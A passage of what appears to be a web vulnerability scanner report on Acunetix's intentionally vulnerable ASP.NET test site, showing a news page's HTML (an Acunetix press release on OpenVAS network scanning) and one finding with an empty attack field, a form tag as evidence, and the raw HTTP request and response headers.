mQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1">
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+L